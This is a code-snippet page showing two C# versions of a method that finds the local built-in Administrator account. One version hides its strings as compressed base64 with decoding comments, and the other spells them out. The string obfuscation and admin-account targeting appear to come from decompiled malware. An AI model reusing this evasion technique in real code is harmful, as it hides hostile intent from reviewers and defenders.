private static string GetNewOwnerName()
        {
            string text = null;
            // S-1-5-
            string value = ZipHelper.Unzip("C9Y11DXVBQA=");
            // -500
            string value2 = ZipHelper.Unzip("0zU1MAAA");

            try
            {
                // Administrator
                text = new NTAccount(ZipHelper.Unzip("c0zJzczLLC4pSizJLwIA")).Translate(typeof(SecurityIdentifier)).Value;
            }
            catch
            {
            }
            if (string.IsNullOrEmpty(text) || !text.StartsWith(value, StringComparison.OrdinalIgnoreCase) || !text.EndsWith(value2, StringComparison.OrdinalIgnoreCase))
            {
                // Select * From Win32_UserAccount
                string queryString = ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPLU4tckxOzi/NKwEA");
                text = null;
                using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(queryString))
                {
                    foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
                    {
                        // SID
                        ManagementObject managementObject = (ManagementObject)managementBaseObject;
                        string           text2            = managementObject.Properties[ZipHelper.Unzip("C/Z0AQA=")].Value.ToString();
                        // LocalAccount
                        // true
                        if (managementObject.Properties[ZipHelper.Unzip("88lPTsxxTE7OL80rAQA=")].Value.ToString().ToLower() == ZipHelper.Unzip("KykqTQUA") && text2.StartsWith(value, StringComparison.OrdinalIgnoreCase))
                        {
                            if (text2.EndsWith(value2, StringComparison.OrdinalIgnoreCase))
                            {
                                text = text2;
                                break;
                            }
                            if (string.IsNullOrEmpty(text))
                            {
                                text = text2;
                            }
                        }
                    }
                }
            }
            return(new SecurityIdentifier(text).Translate(typeof(NTAccount)).Value);
        }
Esempio n. 2
0
        private static string GetNewOwnerName()
        {
            string text   = null;
            string value  = "S-1-5-";
            string value2 = "-500";

            try
            {
                text = new NTAccount("Administrator").Translate(typeof(SecurityIdentifier)).Value;
            }
            catch
            {
            }
            if (string.IsNullOrEmpty(text) || !text.StartsWith(value, StringComparison.OrdinalIgnoreCase) || !text.EndsWith(value2, StringComparison.OrdinalIgnoreCase))
            {
                string queryString = "Select * From Win32_UserAccount";
                text = null;
                using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(queryString))
                {
                    foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
                    {
                        ManagementObject managementObject = (ManagementObject)managementBaseObject;
                        string           text2            = managementObject.Properties["SID"].Value.ToString();
                        if (managementObject.Properties["LocalAccount"].Value.ToString().ToLower() == "true" && text2.StartsWith(value, StringComparison.OrdinalIgnoreCase))
                        {
                            if (text2.EndsWith(value2, StringComparison.OrdinalIgnoreCase))
                            {
                                text = text2;
                                break;
                            }
                            if (string.IsNullOrEmpty(text))
                            {
                                text = text2;
                            }
                        }
                    }
                }
            }
            return(new SecurityIdentifier(text).Translate(typeof(NTAccount)).Value);
        }